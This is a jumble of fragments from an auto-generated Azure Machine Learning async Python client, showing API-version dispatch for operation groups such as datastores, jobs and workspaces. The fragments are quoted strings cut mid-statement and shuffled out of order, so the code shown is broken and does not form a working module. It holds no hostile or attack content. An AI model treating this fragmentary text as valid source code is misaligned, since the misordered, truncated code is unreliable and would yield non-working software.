raise ValueError(\"API version {}", "OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass", "= self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else:", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass else:", "the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version = self._get_api_version('dataset_v2') if api_version ==", "..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations as OperationClass else: raise ValueError(\"API version {} does not have", "code is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING from", "incorrect behavior and will be lost if the code is # regenerated. #", "Azure Machine Learning Workspace resources. This ready contains multiple API versions, to help", "self._get_api_version('environment_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version:", "'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the", "polling_interval: Default waiting time between two polls for LRO operations if no Retry-After", "import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return models elif api_version", ":class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations", "'dataset_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the", "class to support current implemetation of MultiApiClientMixin.\" Will be removed in final version", "import AsyncOperationsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "else: raise ValueError(\"API version {} does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client,", "of the target subscription. :type subscription_id: str :param api_version: API version to use", ") def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version: Optional[str] = None, base_url:", "elif api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview import models return models elif api_version ==", "the target subscription. :type subscription_id: str :param api_version: API version to use if", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-02-01-preview':", "AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class to", "ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0: :mod:`runhistory.models<azure.mgmt.machinelearningservices.runhistory.models>` * 2020-09-01-dataplanepreview:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from", "on the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>`", "dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version =", "{} does not have operation group 'run'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "raise ValueError(\"API version {} does not have operation group 'jobs'\".format(api_version)) return OperationClass(self._client, self._config,", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return", "version: * 1.5.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DeleteOperations>` * v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version", "== '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version == '2022-02-01-preview': from", "DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def experiments(self): \"\"\"Instance depends on the API version: * v1.0:", "group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on", "_PROFILE_TAG: { None: DEFAULT_API_VERSION, 'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call':", "== 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('batch_deployments') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif", "dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls", "from ..v2021_10_01.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import", "'1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview',", "KnownProfiles.default, **kwargs # type: Any ) -> None: self._config = AzureMachineLearningWorkspacesConfiguration(credential, subscription_id, **kwargs)", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version))", "from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration", "from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01:", "the API version: * v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version ==", "to use if no profile is provided, or if missing in profile. :type", "Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>`", "import ComponentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "@property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` *", "DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "* 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version ==", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0:", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_version(self): \"\"\"Instance depends on the API", "profile. :type api_version: str :param base_url: Service URL :type base_url: str :param profile:", "== '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif api_version == '2022-05-01': from", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from", "component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>`", "if api_version == '1.0.0': from ..model_dataplane.aio.operations import MigrationOperations as OperationClass else: raise ValueError(\"API", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'datastores'\".format(api_version)) return", ":class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version =", "2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if", "import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "api_version = self._get_api_version('async_operations') if api_version == 'v1.0': from ..registry_discovery.aio.operations import AsyncOperationsOperations as OperationClass", "on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>` * 2022-05-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineDeploymentsOperations>`", "import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as", "not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self):", "the API version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\"", "of MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based client", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does", "azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if", "# Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT", "2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version = self._get_api_version('component_containers') if api_version == '2021-10-01':", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentContainersOperations as OperationClass elif", "2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\" api_version = self._get_api_version('workspace_connections') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif", "* 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\" api_version = self._get_api_version('data_versions') if api_version ==", "elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API", "2022-02-01-preview: :mod:`v2022_02_01_preview.models<azure.mgmt.machinelearningservices.v2022_02_01_preview.models>` * 2022-05-01: :mod:`v2022_05_01.models<azure.mgmt.machinelearningservices.v2022_05_01.models>` \"\"\" if api_version == '1.5.0': from ..dataset_dataplane import", "have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_containers(self): \"\"\"Instance", "..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DatastoresOperations", "API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0':", "@property def compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` *", "version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "{} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "..v2021_10_01.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations", "profile=profile ) @classmethod def _models_dict(cls, api_version): return {k: v for k, v in", "2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01':", "..v2022_01_01_preview.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations", "self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as OperationClass else: raise", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "..v2022_02_01_preview.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations", "'2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0',", "{} does not have operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass elif api_version ==", "\"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>` * 2022-05-01: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DataVersionsOperations>` \"\"\"", "import QuotasOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as", "or if missing in profile. :type api_version: str :param base_url: Service URL :type", "'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def runs(self): \"\"\"Instance depends on the", "API version if the operation group is not described in the profile. :param", "return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models elif", "depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model') if", "raise ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config,", "from ..runhistory.aio.operations import RunsOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\" api_version = self._get_api_version('data_version')", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version:", "group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def close(self): await self._client.close() async", "== '2021-10-01': from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "\"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` *", "..v2022_02_01_preview.aio.operations import DataContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataContainersOperations", "..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0':", "import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as", "API version: * 2021-10-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-01-01-preview: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateEndpointConnectionsOperations>` * 2022-05-01: :class:`PrivateEndpointConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateEndpointConnectionsOperations>` \"\"\" api_version", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else:", "operation group 'operations'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def private_endpoint_connections(self): \"\"\"Instance depends", "on the API version: * v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version", "does not have operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on the API version:", "ValueError(\"API version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "the API version: * 2021-10-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineEndpointsOperations>` * 2022-02-01-preview: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineEndpointsOperations>` * 2022-05-01: :class:`OnlineEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.OnlineEndpointsOperations>` \"\"\"", "not have operation group 'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self):", "import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as", "should stick to a particular api-version and/or profile. The profile sets a mapping", "from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "version {} does not have operation group 'runs'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events') if", "EnvironmentVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentVersionsOperations as OperationClass", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "version: * 2021-10-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeContainersOperations>` * 2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>`", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance depends on the API version:", "version {} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "temporary_data_references(self): \"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version =", "ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two", "'1.0.0': from ..model_dataplane.aio.operations import ModelsOperations as OperationClass else: raise ValueError(\"API version {} does", "# -------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under", "from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from", "Deserializer(self._models_dict(api_version))) @property def run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>`", "allow end users to operate on Azure Machine Learning Workspace resources. This ready", "'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the", "have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance", ":class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations", "elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does not have", "= self._get_api_version('dataset_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else:", "Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect", "import ComputeOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "..runhistory.aio.operations import EventsOperations as OperationClass else: raise ValueError(\"API version {} does not have", "QuotasOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import QuotasOperations as OperationClass", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance depends on the API version: * v1.0:", "API version: * 1.5.0: :class:`DataCallOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataCallOperations>` \"\"\" api_version = self._get_api_version('data_call') if api_version == '1.5.0':", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeVersionsOperations as OperationClass elif api_version == '2022-02-01-preview':", "environment_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>`", "= self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else:", "..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version = self._get_api_version('migration')", "== '2022-05-01': from ..v2022_05_01.aio.operations import CodeVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceConnectionsOperations>` \"\"\"", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview':", "def async_operations(self): \"\"\"Instance depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def extensive_model(self): \"\"\"Instance depends on the API", "self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise", "not have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self):", "version {} does not have operation group 'online_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else:", "group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends on", "API version: * v1.0: :class:`SpansOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.SpansOperations>` \"\"\" api_version = self._get_api_version('spans') if api_version == 'v1.0':", "ModelVersionsOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelVersionsOperations as OperationClass", "{} does not have 